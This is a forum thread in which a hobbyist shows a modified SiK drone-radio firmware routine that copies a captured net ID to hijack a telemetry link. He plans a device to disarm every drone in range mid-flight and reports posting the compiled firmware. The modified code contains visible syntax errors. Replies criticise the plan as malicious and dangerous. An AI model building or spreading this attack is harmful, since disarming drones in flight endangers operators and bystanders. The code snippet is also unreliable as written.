Project Status;          Design

Project Progress;       [∎∎∎                       ]


Once the project is complete i will be publishing it here


My write-up on my Blog www.googlex.co.uk/blog...


Hello DiyDrone.com Community!


My name is Jack and i'm currently working on a project to do with an exploit recently discovered (Oct 2015) in the MavLink Protocol.

First off the Exploit;

The exploit is to do with the radio's method of authentication, They use the header 'Net_Id' to identify themselves to the other radio's during transmission of data.

Within the Sik-Firmware for the SiLabs Si1000 ISM Radio thier is a file named "radio.c" within this file thier is some code that pulls the devices 'Net_Id' and checks it against incoming data packets to check if they are ment for the radio that is recieving them.

This is the original code;


// decode the header
errcount = golay_decode(6, buf, gout);
if (gout[0] != netid[0] || gout[1] != netid[1]) {
// its not for our network ID
debug("netid %x %x\n",
(unsigned)gout[0],
(unsigned)gout[1]);
goto failed;
}

However some guy has been able to modify this code so that when the radio receives a data packet it reads it's 'Net_Id' and sets the 'Net_Id' of the radio that received the packet to the same as the one that was just received, then the radio is able
to issue a command to the drone that it has just stolen the 'Net_Id' from such as "CMD_DISARM" witch would intern disarm the drone mid-flight!

Here is the "Modified" Code;


// decode the header
errcount = golay_decode(6, buf, gout);
if (gout[0] != netid[0] || gout[1] != netid[1]) {
// its not for our network ID
/* Mod */
// Set our radio to use the captured packets
NetID param_set(PARAM_NETID, gout[0]))
// Save the value to flash
param_save();
// To read the new value we need to reboot. Rebooting
RSTSRC |= (1 4);
/* End of Mod*/
}

My problem(s) are as follows.

I Can't compile the modded firmware as all of my Linux computers refuse to install Mono-Develop :/
I would like to have this running on a standalone Hope-RF HM-TRP 433 chip that is connected to an arduino, The arduino would have a display that when a button is pressed the display shows something like LINE1 "Drone-B-Gone" LINE2 "Disarming all drones in the area!" and the arduino would use Serial.Send() to send the command to the Hope-RF chip that contains the packet "CMD_DISARM" that would disarm the quad in flight.
I have no way of flashing the Hope-RF HM-TRP chip! I read somewhere that an arduino Uno could be used however i have lost that link :(
I Have NO Arduino experience so i don't even know how i would start coding something like this


And now for my Questions!
1. Can i link several HopeRF HM-TRP Modules together?? What i mean by this is could i possibly have 434/868/915 Modules with the modded code all linked to together with the Tx and Rx pins and the same power source (DUH with different antennas) so that when the button is pressed no matter what telemetry band the drone is using it WILL cover it?
2. Can someone please send me in the right direction on how i can achieve what i have asked above with an arduino??

All help is greatly appreciated!

Links to prior Research

http://madhacker.org/how-to-hijack-a-drone-by-telemetry-and-prevent...

https://github.com/Dronecode/SiK

http://www.shellntel.com/blog/2015/9/25/drone-code-execution

http://rc-fpv.pl/viewtopic.php?t=8011

Obviously i am not doing this in malicious intent... ;)

Thanks a lot guys!!!

Peace out ~Jack

<-------------------------------- UPDATE-1 ----------------------------------->

Having Second thoughts on how i should do this,

I am pondering as to weather i should use an android tablet with the usb OTG wire.

This way (As Andre K pointed out) I would be showing more skills as i am a confident android developer so i could possibly make my own app that gives me a multitude of functions such as Follow me, Disable, Manual Control, RTH//RTL, Set new home and go their also i could do flight mode change. I think this would possibly help me demonstrate more skills?

What do you guys think? Start you response with UPDATE-1 ;)

~Jack

<------------------------------ UPDATE-1 END ------------------------------->

<-------------------------------- UPDATE-2 ----------------------------------->

Finally getting somewhere!

A HUGE Thanks to Marcin Krawczyk for recommending Fedora to me!

I Have finally got the HRM_TRP firmware package compiled :)

It is attached below, This is the Fw WITH the mod :)

LINK TO FW FILE  <-- Not the correct upload!

I pulled an all niter doing this :S

~Jack

===

SUB UPDATE!

I accidentally uploaded the wrong file, this is the full dst output file :)

LINK TO FW FILE

===

<------------------------------ UPDATE-2 END ------------------------------->


By Jack Rogers


© InkyHacker 2016


Views: 4233

Attachments:

Reply to This

Replies to This Discussion

You should talk with Tridge directly.

This attempt is way too malicious to be necessary to demonstrate a security risk as a part of a project.

No decent white-hat hacker would contribute to posting anything like the descrioptions says in working condition, as it's simply an overkill for purposes other than evil :)

You can prove your point by just issuing a harmless command, or changing an unimportant parameter by 5% , no need for multiple frequencies and disarming.

I have been contacted by several people with big commercial ideas for similar "drone-inhibiting" devices, the main problem is that nobody with such device actually knows the difference between legal/approved operations and the other, and midair disarming/even LAND may just as well cause more dangerous situations that continued flight.

I think there's nothing to exploit as the firmware has been designed without security in mind. The NET ID's are not for security reasons.

While the lack of security might be a concern it's not by accident - it is entirely intentional. Choose another topic for your project.

I agree, depending of the knowledge/skills level you wish to demonstrate, the project may be too easy.

The main reason behind the lack of security, is that the radio does not have a lot of processing power, so proper encryption, with fast recovery and ability to handle packet loss is difficult to implement.

Sorry for sounding dumb here, But who is Tridge?

~Jack

https://en.m.wikipedia.org/wiki/Andrew_Tridgell
His nickname is Tridge, He's the father of SiK firmware and APM mentor ;-) and leading developer.

Hmmm i see, Now how would one go about contacting him i wonder??

I have notified him about this thread. :)

Thanks alot man :D

Okay, Just bought these for tbis project ;)

http://www.amazon.co.uk/gp/product/B018XNYL5U

It's all coming together :D

I bought these specific radios because both of them have a USB interface and serial

Now i need someone to compile the firmware for me,

Marcin Krawczyk if i send you the files could you compile a 433 firmware file for me please?

I MEANT UART NOT SERIAL ;/

I have also emailed him on 3 separate email addresses i found of him as i don't know witch ones are active!

~Jack

Reply to Discussion

RSS

© 2019   Created by Chris Anderson.   Powered by

Badges  |  Report an Issue  |  Terms of Service